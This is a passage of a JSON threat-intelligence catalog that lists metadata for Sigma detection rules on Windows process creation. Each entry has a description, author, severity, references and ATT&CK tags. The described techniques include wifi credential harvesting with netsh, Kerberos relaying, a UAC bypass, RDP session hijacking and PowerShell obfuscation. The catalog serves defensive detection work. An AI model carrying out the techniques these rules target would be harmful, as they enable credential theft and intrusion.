], "filename": "proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708", "https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "value": "Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution" }, { "description": "Detects PowerShell scripts to set the ACL to a file in the Windows folder", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-18", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_set_acl_susp_location.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1", "https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": 
"0944e002-e3f6-4eb5-bf69-3a3067b53d73", "value": "PowerShell Set-Acl On Windows Folder" }, { "description": "Detects code execution via Pester.bat (Pester - Powershell Module for testing)", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-08-20", "falsepositive": [ "Legitimate use of Pester for writing tests for Powershell scripts and modules" ], "filename": "proc_creation_win_lolbin_pester.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/Oddvarmoe/status/993383596244258816", "https://twitter.com/_st0pp3r_/status/1560072680887525378", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pester.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18988e1b-9087-4f8a-82fe-0414dce49878", "value": "Execute Code with Pester.bat as Parent" }, { "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", "meta": { "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "creation_date": "2020-10-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_priv_reg_or_ps.yml" 
], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "value": "Non-privileged Usage of Reg or Powershell" }, { "description": "Detects inline execution of PowerShell code from a file", "meta": { "author": "frack113", "creation_date": "2022-12-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_exec_data_file.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "value": "Powershell Inline Execution From A File" }, { "description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)", "creation_date": "2019-09-12", "falsepositive": [ "Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. 
It is best to add additional filters or use this to hunt for anomalies" ], "filename": "proc_creation_win_powershell_non_interactive_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20200925032237/https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_non_interactive_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f4bbd493-b796-416e-bbf2-121235348529", "value": "Non Interactive PowerShell Process Spawned" }, { "description": "Detects nltest commands that can be used for information discovery", "meta": { "author": "Arun Chauhan", "creation_date": "2023-02-03", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_nltest_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_execution.yml" ], "tags": [ "attack.discovery", "attack.t1016", "attack.t1018", "attack.t1482" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"903076ff-f442-475a-b667-4f246bcc203b", "value": "Nltest.EXE Execution" }, { "description": "Identifies the creation of local users via the net.exe command.", "meta": { "author": "Endgame, JHasenbusch (adapted to Sigma for oscd.community)", "creation_date": "2018-10-30", "falsepositive": [ "Legitimate user creation.", "Better use event IDs for user creation rather than command line rules." ], "filename": "proc_creation_win_net_user_add.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", "value": "New User Created Via Net.EXE" }, { "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs.", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2022-12-29", "falsepositive": [ "Legitimate usage for administration purposes" ], "filename": "proc_creation_win_ssh_proxy_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/211/files", "https://lolbas-project.github.io/lolbas/Binaries/Ssh/", "https://man.openbsd.org/ssh_config#LocalCommand", "https://gtfobins.github.io/gtfobins/ssh/", "https://man.openbsd.org/ssh_config#ProxyCommand", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssh_proxy_execution.yml" 
], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "value": "Program Executed Using Proxy/Local Command Via SSH.EXE" }, { "description": "Detects usage of bitsadmin downloading a file to uncommon target folder", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1197", "attack.s0190", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6e30c82f-a9f8-4aab-b79c-7c12bce6f248", "value": "File Download Via Bitsadmin To An Uncommon Target Folder" }, { "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. 
As seen used by HAFNIUM and APT27", "meta": { "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-03-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_snapins_hafnium.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.intrinsec.com/apt27-analysis/", "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.collection", "attack.t1114" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25676e10-2121-446e-80a4-71ff8506af47", "value": "Exchange PowerShell Snap-Ins Usage" }, { "description": "Detect the harvesting of wifi credentials using netsh.exe", "meta": { "author": "Andreas Hunkeler (@Karneades), oscd.community", "creation_date": "2020-04-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml" ], "tags": [ "attack.discovery", "attack.credential-access", "attack.t1040" ] }, "related": [ { "dest-uuid": 
"3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff", "value": "Harvesting Of Wifi Credentials Via Netsh.EXE" }, { "description": "Detects the use of KrbRelay, a Kerberos relaying tool", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-04-27", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_krbrelay.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cube0x0/KrbRelay", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_krbrelay.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e96253b8-6b3b-4f90-9e59-3b24b99cf9b4", "value": "HackTool - KrbRelay Execution" }, { "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "value": "UAC Bypass Using PkgMgr and DISM" }, { "description": "Detects 
execution of \"curl.exe\" with the \"file://\" protocol handler in order to read local files.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-07-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_curl_local_file_read.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://curl.se/docs/manpage.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml" ], "tags": [ "attack.execution" ] }, "uuid": "aa6f6ea6-0676-40dd-b510-6e46f02d8867", "value": "Local File Read Using Curl.EXE" }, { "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml" ], "tags": [ "attack.credential-access", "attack.t1552.001", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9212f354-7775-4e28-9c9f-8f0a4544e664", "value": "Active Directory Database Snapshot Via ADExplorer" }, { "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", "meta": { "author": "frack113", 
"creation_date": "2022-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_token_obfuscation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/danielbohannon/Invoke-Obfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027.009" ] }, "related": [ { "dest-uuid": "0533ab23-3f7d-463f-9bd8-634d27e4dee1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "value": "Powershell Token Obfuscation - Process Creation" }, { "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior", "creation_date": "2021-12-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_schtasks_disable.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/MichalKoczwara/status/1553634816016498688", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_disable.yml" ], "tags": [ "attack.impact", "attack.t1489" ] }, "related": [ { "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", "value": "Disable Important Scheduled Task" }, { 
"description": "Detects the creation of a new service using powershell.", "meta": { "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "creation_date": "2023-02-20", "falsepositive": [ "Legitimate administrator or user creates a service for legitimate reasons.", "Software installation" ], "filename": "proc_creation_win_powershell_create_service.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_create_service.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c02e96b7-c63a-4c47-bd83-4a9f74afcfb2", "value": "New Service Creation Using PowerShell" }, { "description": "Detects the addition of a new LogonScript to the registry value \"UserInitMprLogonScript\" for potential persistence", "meta": { "author": "Tom Ueltschi (@c_APT_ure)", "creation_date": "2019-01-12", "falsepositive": [ "Legitimate addition of Logon Scripts via the command line by administrators or third party tools" ], "filename": "proc_creation_win_registry_logon_script.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_logon_script.yml" ], "tags": [ "attack.persistence", "attack.t1037.001" ] }, "related": [ { "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "21d856f9-9281-4ded-9377-51a1a6e2a432", "value": "Potential Persistence Via Logon Scripts - CommandLine" }, { "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", "meta": { "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "creation_date": "2022-05-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_ntlmrelay.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access", "attack.t1212" ] }, "related": [ { "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bb76d96b-821c-47cf-944b-7ce377864492", "value": "Suspicious NTLM Authentication on the Printer Spooler Service" }, { "description": "Detects Obfuscated Powershell via Stdin in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", "value": "Invoke-Obfuscation Via Stdin" }, { "description": "Detects potentially suspicious child processes of \"aspnet_compiler.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_aspnet_compiler_susp_child_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/", "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9ccba514-7cb6-4c5c-b377-700758f2f120", "value": "Suspicious Child Process of AspNetCompiler" }, { "description": "Detects RDP session hijacking by using MSTSC shadowing", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-01-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/kmkz_security/status/1220694202301976576", "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml" ], "tags": [ "attack.lateral-movement", "attack.t1563.002" ] }, "related": [ { "dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6ba5a05f-b095-4f0a-8654-b825f4f16334", "value": "Potential MSTSC Shadowing Activity" }, { "description": "Detects suspicious PowerShell invocation with a parameter substring", "meta": { "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_susp_parameter_variation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "http://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36210e0d-5b19-485d-a087-c096088885f0", "value": "Suspicious PowerShell Parameter Substring" }, { "description": "Detect the use of \"sc.exe\" to change the startup type of a service to \"disabled\" or \"demand\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "False positives may occur with troubleshooting scripts" ], "filename": "proc_creation_win_sc_disable_service.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ 
"https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_disable_service.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85c312b7-f44d-4a51-a024-d671c40b49fc", "value": "Service StartupType Change Via Sc.EXE" }, { "description": "This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", "meta": { "author": "Agro (@agro_sev) oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Direct PS command execution through SQLToolsPS.exe is uncommon; a child process sqltoolsps.exe spawned by smss.exe is a legitimate action." 
], "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/pabraeken/status/993298228840992768", "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001", "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", "value": "SQL Client Tools PowerShell Session Detection" }, { "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_csvde_export.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.cybereason.com/blog/research/operation-ghostshell-novel-rat-targets-global-aerospace-and-telecoms-firms", "https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://businessinsights.bitdefender.com/deep-dive-into-a-backdoordiplomacy-attack-a-study-of-an-attackers-toolkit", "https://redcanary.com/blog/msix-installers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csvde_export.yml" ], "tags": [ "attack.exfiltration", "attack.discovery", 
"attack.t1087.002" ] }, "related": [ { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", "value": "Active Directory Structure Export Via Csvde.EXE" }, { "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-01", "falsepositive": [ "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "filename": "proc_creation_win_net_user_default_accounts_manipulation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml" ], "tags": [ "attack.collection", "attack.t1560.001" ] }, "related": [ { "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b768e71-86f2-4879-b448-81061cbae951", "value": "Suspicious Manipulation Of Default Accounts Via Net.EXE" }, { "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": 
